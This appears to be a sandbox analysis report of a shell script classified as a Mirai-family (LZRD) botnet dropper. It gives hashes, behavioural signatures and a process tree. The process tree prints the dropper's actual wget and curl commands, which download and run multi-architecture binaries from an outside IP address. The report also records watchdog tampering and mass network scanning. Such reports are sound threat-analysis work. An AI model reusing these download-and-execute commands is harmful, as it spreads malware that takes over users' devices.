Analysis
-
max time kernel
123s -
max time network
152s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
23-12-2024 06:16
Static task
static1
Behavioral task
behavioral1
Sample
Pemex.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
Pemex.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
Pemex.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
Pemex.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
Pemex.sh
-
Size
1KB
-
MD5
e18ba04d72384ac85e6117c774f6d4f9
-
SHA1
6cb8e9a2da2db042da0875a08f43cc867b8a2c5b
-
SHA256
289876bf62e9a2a364da63cceb9a865c84792377a700afb676811ee53113919e
-
SHA512
3e69c0fdb07347f2dcd8d3b3d9514d392a572173afec60fd702180cf3f7d5d21bca67dff2cb022641c7f0a2df4b817f1589a6a1599726ddeea67ba5c768e954d
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
Contacts a large (85022) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 734 chmod 768 chmod 802 chmod 818 chmod 829 chmod 884 chmod 898 chmod 740 chmod 870 chmod 909 chmod -
Executes dropped EXE 10 IoCs
ioc pid Process /tmp/awoo 735 awoo /tmp/awoo 741 awoo /tmp/awoo 769 awoo /tmp/awoo 803 awoo /tmp/awoo 819 awoo /tmp/awoo 830 awoo /tmp/awoo 871 awoo /tmp/awoo 885 awoo /tmp/awoo 899 awoo /tmp/awoo 910 awoo -
Modifies Watchdog functionality 1 TTPs 16 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/misc/watchdog awoo File opened for modification /dev/watchdog awoo File opened for modification /dev/watchdog awoo File opened for modification /dev/misc/watchdog awoo File opened for modification /dev/watchdog awoo File opened for modification /dev/misc/watchdog awoo File opened for modification /dev/watchdog awoo File opened for modification /dev/watchdog awoo File opened for modification /dev/watchdog awoo File opened for modification /dev/watchdog awoo File opened for modification /dev/misc/watchdog awoo File opened for modification /dev/watchdog awoo File opened for modification /dev/misc/watchdog awoo File opened for modification /dev/misc/watchdog awoo File opened for modification /dev/misc/watchdog awoo File opened for modification /dev/misc/watchdog awoo -
Enumerates active TCP sockets 1 TTPs 8 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo -
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads system network configuration 1 TTPs 8 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo File opened for reading /proc/net/tcp awoo -
description ioc Process File opened for reading /proc/702/exe awoo File opened for reading /proc/889/exe awoo File opened for reading /proc/893/exe awoo File opened for reading /proc/826/fd awoo File opened for reading /proc/905/fd awoo File opened for reading /proc/804/fd awoo File opened for reading /proc/872/fd awoo File opened for reading /proc/877/fd awoo File opened for reading /proc/700/exe awoo File opened for reading /proc/788/exe awoo File opened for reading /proc/886/exe awoo File opened for reading /proc/1/fd awoo File opened for reading /proc/310/fd awoo File opened for reading /proc/710/fd awoo File opened for reading /proc/664/exe awoo File opened for reading /proc/710/fd awoo File opened for reading /proc/367/fd awoo File opened for reading /proc/903/fd awoo File opened for reading /proc/879/fd awoo File opened for reading /proc/667/exe awoo File opened for reading /proc/313/fd awoo File opened for reading /proc/166/fd awoo File opened for reading /proc/822/fd awoo File opened for reading /proc/426/fd awoo File opened for reading /proc/914/fd awoo File opened for reading /proc/835/fd awoo File opened for reading /proc/836/exe awoo File opened for reading /proc/788/fd awoo File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/700/exe awoo File opened for reading /proc/1/fd awoo File opened for reading /proc/914/exe awoo File opened for reading /proc/672/fd awoo File opened for reading /proc/222/fd awoo File opened for reading /proc/311/fd awoo File opened for reading /proc/367/fd awoo File opened for reading /proc/664/exe awoo File opened for reading /proc/670/exe awoo File opened for reading /proc/873/fd awoo File opened for reading /proc/826/fd awoo File opened for reading /proc/426/fd awoo File opened for reading /proc/426/exe awoo File opened for reading /proc/667/fd awoo File opened for reading /proc/670/fd awoo File opened for reading /proc/703/fd awoo File opened for reading /proc/426/fd awoo File opened for reading /proc/773/fd awoo File opened for reading /proc/903/exe awoo File opened for reading /proc/775/fd awoo File opened for reading /proc/820/exe awoo File opened for reading /proc/222/fd awoo File opened for reading /proc/142/fd awoo File opened for reading /proc/810/fd awoo File opened for reading /proc/710/exe awoo File opened for reading /proc/672/fd awoo File opened for reading /proc/166/fd awoo File opened for reading /proc/822/fd awoo File opened for reading /proc/875/fd awoo File opened for reading /proc/426/fd awoo File opened for reading /proc/810/fd awoo File opened for reading /proc/316/fd awoo File opened for reading /proc/222/fd awoo File opened for reading /proc/313/fd awoo File opened for reading /proc/836/fd awoo -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 738 curl 739 cat 737 wget -
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/awoo Pemex.sh File opened for modification /tmp/loligang.mpsl wget File opened for modification /tmp/loligang.arm6 wget File opened for modification /tmp/loligang.arm6 curl File opened for modification /tmp/loligang.ppc wget File opened for modification /tmp/loligang.m68k curl File opened for modification /tmp/loligang.x86 wget File opened for modification /tmp/loligang.mpsl curl File opened for modification /tmp/loligang.ppc curl File opened for modification /tmp/loligang.m68k wget File opened for modification /tmp/loligang.sh4 curl File opened for modification /tmp/loligang.arm5 wget File opened for modification /tmp/loligang.arm5 curl File opened for modification /tmp/loligang.x86 curl File opened for modification /tmp/loligang.mips wget File opened for modification /tmp/loligang.mips curl File opened for modification /tmp/loligang.arm4 curl File opened for modification /tmp/loligang.arm7 wget File opened for modification /tmp/loligang.arm7 curl File opened for modification /tmp/loligang.sh4 wget
Processes
-
/tmp/Pemex.sh/tmp/Pemex.sh1⤵
- Writes file to tmp directory
PID:703 -
/usr/bin/wgetwget http://185.255.120.43/lmaoWTF/loligang.x862⤵
- Writes file to tmp directory
PID:706
-
-
/usr/bin/curlcurl -O http://185.255.120.43/lmaoWTF/loligang.x862⤵
- Writes file to tmp directory
PID:724
-
-
/bin/catcat loligang.x862⤵PID:733
-
-
/bin/chmodchmod +x awoo loligang.x86 Pemex.sh systemd-private-60ecbd699a944fc09467a2f903e6ded9-systemd-timedated.service-wd1f592⤵
- File and Directory Permissions Modification
PID:734
-
-
/tmp/awoo./awoo2⤵
- Executes dropped EXE
PID:735
-
-
/usr/bin/wgetwget http://185.255.120.43/lmaoWTF/loligang.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:737
-
-
/usr/bin/curlcurl -O http://185.255.120.43/lmaoWTF/loligang.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:738
-
-
/bin/catcat loligang.mips2⤵
- System Network Configuration Discovery
PID:739
-
-
/bin/chmodchmod +x awoo loligang.mips loligang.x86 Pemex.sh systemd-private-60ecbd699a944fc09467a2f903e6ded9-systemd-timedated.service-wd1f592⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/awoo./awoo2⤵
- Executes dropped EXE
PID:741
-
-
/usr/bin/wgetwget http://185.255.120.43/lmaoWTF/loligang.mpsl2⤵
- Writes file to tmp directory
PID:743
-
-
/usr/bin/curlcurl -O http://185.255.120.43/lmaoWTF/loligang.mpsl2⤵
- Writes file to tmp directory
PID:746
-
-
/bin/catcat loligang.mpsl2⤵PID:767
-
-
/bin/chmodchmod +x awoo loligang.mips loligang.mpsl loligang.x86 Pemex.sh systemd-private-60ecbd699a944fc09467a2f903e6ded9-systemd-timedated.service-wd1f592⤵
- File and Directory Permissions Modification
PID:768
-
-
/tmp/awoo./awoo2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:769
-
-
/usr/bin/wgetwget http://185.255.120.43/lmaoWTF/loligang.arm42⤵PID:774
-
-
/usr/bin/curlcurl -O http://185.255.120.43/lmaoWTF/loligang.arm42⤵
- Writes file to tmp directory
PID:785
-
-
/bin/chmodchmod +x awoo loligang.arm4 loligang.mips loligang.mpsl loligang.x86 Pemex.sh systemd-private-60ecbd699a944fc09467a2f903e6ded9-systemd-timedated.service-wd1f592⤵
- File and Directory Permissions Modification
PID:802
-
-
/tmp/awoo./awoo2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:803
-
-
/usr/bin/wgetwget http://185.255.120.43/lmaoWTF/loligang.arm52⤵
- Writes file to tmp directory
PID:807
-
-
/usr/bin/curlcurl -O http://185.255.120.43/lmaoWTF/loligang.arm52⤵
- Writes file to tmp directory
PID:816
-
-
/bin/chmodchmod +x awoo loligang.arm4 loligang.arm5 loligang.mips loligang.mpsl loligang.x86 Pemex.sh systemd-private-60ecbd699a944fc09467a2f903e6ded9-systemd-timedated.service-wd1f592⤵
- File and Directory Permissions Modification
PID:818
-
-
/tmp/awoo./awoo2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:819
-
-
/usr/bin/wgetwget http://185.255.120.43/lmaoWTF/loligang.arm62⤵
- Writes file to tmp directory
PID:823
-
-
/usr/bin/curlcurl -O http://185.255.120.43/lmaoWTF/loligang.arm62⤵
- Writes file to tmp directory
PID:827
-
-
/bin/chmodchmod +x awoo loligang.arm4 loligang.arm5 loligang.arm6 loligang.mips loligang.mpsl loligang.x86 Pemex.sh systemd-private-60ecbd699a944fc09467a2f903e6ded9-systemd-timedated.service-wd1f592⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/awoo./awoo2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:830
-
-
/usr/bin/wgetwget http://185.255.120.43/lmaoWTF/loligang.arm72⤵
- Writes file to tmp directory
PID:835
-
-
/usr/bin/curlcurl -O http://185.255.120.43/lmaoWTF/loligang.arm72⤵
- Writes file to tmp directory
PID:851
-
-
/bin/chmodchmod +x awoo loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.mips loligang.mpsl loligang.x86 Pemex.sh2⤵
- File and Directory Permissions Modification
PID:870
-
-
/tmp/awoo./awoo2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:871
-
-
/usr/bin/wgetwget http://185.255.120.43/lmaoWTF/loligang.ppc2⤵
- Writes file to tmp directory
PID:876
-
-
/usr/bin/curlcurl -O http://185.255.120.43/lmaoWTF/loligang.ppc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:882
-
-
/bin/chmodchmod +x awoo loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.mips loligang.mpsl loligang.ppc loligang.x86 Pemex.sh2⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/awoo./awoo2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:885
-
-
/usr/bin/wgetwget http://185.255.120.43/lmaoWTF/loligang.m68k2⤵
- Writes file to tmp directory
PID:889
-
-
/usr/bin/curlcurl -O http://185.255.120.43/lmaoWTF/loligang.m68k2⤵
- Writes file to tmp directory
PID:893
-
-
/bin/chmodchmod +x awoo loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.m68k loligang.mips loligang.mpsl loligang.ppc loligang.x86 Pemex.sh2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/awoo./awoo2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:899
-
-
/usr/bin/wgetwget http://185.255.120.43/lmaoWTF/loligang.sh42⤵
- Writes file to tmp directory
PID:906
-
-
/usr/bin/curlcurl -O http://185.255.120.43/lmaoWTF/loligang.sh42⤵
- Writes file to tmp directory
PID:907
-
-
/bin/chmodchmod +x awoo loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.m68k loligang.mips loligang.mpsl loligang.ppc loligang.sh4 loligang.x86 Pemex.sh2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/awoo./awoo2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:910
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
87KB
MD55f6d2539a443501c888fc90986479ee6
SHA11f1ce02f9cafc0e684559cd7e36170d6cba370dc
SHA2565775d9b48bb5c73f8e4625ee86f07e33967aecca610947654e8eea692e200137
SHA5123bd781322c46687a8d750c1129b843a2a2312b186094d5918d5d8eac8c0b04ef8ee14a6a14fb74eb557bdb6558f78301a597ee651c4ace2aa23ebe02554a7198
-
Filesize
89KB
MD59a397c973a66d7380ca64d61070b88d3
SHA1f6828d001883357d22adf948b087ca400c5498dc
SHA25667b7d4c356522d870024d4f04289dc6bcc53537209478fe43347511abb7e63fc
SHA51218c4d902787043acdc63b3640f6e405dc8f96be38fbd40664595b1c6224adddcfc7895a20417a0de140c8280dc117f3dc7e9bcbb9336b8f0eabfb9f44d7adb77
-
Filesize
64KB
MD52354f2531c0bf296738fa7733c42785f
SHA186508e4ee74c70bf226f6666bf227a12be69dcad
SHA2563d0b5252c0f8736759af8b122612395ea484794afbdeb5435769f3c164d04c93
SHA512eda30463d2e8355af4d6626815aedb78b1b5d43c4df53e4a9a72405074a22e9fd09f54e882b0c5ad5136202907a7e6e599d29d325d6e0b3188e6f8ff77abe679